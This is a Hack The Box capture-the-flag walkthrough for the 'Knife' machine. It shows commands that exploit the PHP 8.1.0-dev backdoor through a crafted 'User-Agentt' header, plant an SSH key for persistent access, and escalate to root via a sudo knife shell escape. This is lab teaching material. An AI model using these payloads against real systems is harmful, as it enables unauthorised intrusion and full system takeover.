HTB: Knife ¶

Summary with Spoilers

This machine was running PHP version 8.1.0-dev, which includes a known backdoor vulnerability.
I used a crafted User-Agentt header to achieve RCE and gain access as the james user.
Privilege escalation was achieved by exploiting the knife command with sudo, following the GTFOBins instructions for a root shell.

Enumeration¶

$ sudo nmap -n -sC -sV -F $t
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-02 12:37 CST
Nmap scan report for 10.10.10.242
Host is up (0.12s latency).
Not shown: 98 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 be:54:9c:a3:67:c3:15:c3:64:71:7f:6a:53:4a:4c:21 (RSA)
|   256 bf:8a:3f:d4:06:e9:2e:87:4e:c9:7e:ab:22:0e:c0:ee (ECDSA)
|_  256 1a:de:a1:cc:37:ce:53:bb:1b:fb:2b:0b:ad:b3:f6:84 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Let's check the PHP version:

$ curl -si http://$t | grep X-Pow
X-Powered-By: PHP/8.1.0-dev

Exploitation¶

PHP version 8.1.0-dev has a remote code execution vulnerability. It's actually a malicious backdoor that was quickly discovered and removed in 2021.[^1]

It is easily exploited using a sneaky HTTP header:

$ curl -s -H 'User-Agentt: zerodiumsystem("id");' http://$t  | head -n1
uid=1000(james) gid=1000(james) groups=1000(james)

$ curl -s -H 'User-Agentt: zerodiumsystem("cat /home/james/user.txt");' http://$t  | head -n1
a5c3a0[...]

I could also create a reverse-shell using the technique above. But why do that when I could get a proper SSH login shell?

$ curl -si -H 'User-Agentt: zerodiumsystem("echo ssh-ed25519\ AAAAC3NzaC1lZDI1NTE5AAAAIHO5Uph4qLCUAKHPPFPwZkQjYzBhDJfnIlH3BQY9WT0T\ e@notahacker >> /home/james/.ssh/authorized_keys");' http://$t  | head -n1
HTTP/1.1 200 OK

$ ssh james@$t
The authenticity of host '10.10.10.242 (10.10.10.242)' can't be established.
ED25519 key fingerprint is SHA256:U3tuGrGxSv//jAzSQDRiUNlQnE6LWwounrcc2Bd0qC4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.242' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
[...]

james@knife:~$ cat .ssh/authorized_keys 
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHO5Uph4qLCUAKHPPFPwZkQjYzBhDJfnIlH3BQY9WT0T e@notahacker

Privilege Escalation¶

james@knife:~$ sudo -l
Matching Defaults entries for james on knife:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User james may run the following commands on knife:
    (root) NOPASSWD: /usr/bin/knife

knife is a utility used with Chef.

james@knife:~$ /usr/bin/knife --help
Chef Infra Client: 16.10.8

Docs: https://docs.chef.io/workstation/knife/
Patents: https://www.chef.io/patents

Usage: knife sub-command (options)
[...]

There is an entry for knife in GTFOBins. Like so:

james@knife:~$ sudo knife exec -E 'exec "/bin/sh"'
## id
uid=0(root) gid=0(root) groups=0(root)
## cat /root/root.txt
a5c3a0[...]

HTB: Knife¶

Enumeration¶

Exploitation¶

Privilege Escalation¶

HTB: Knife ¶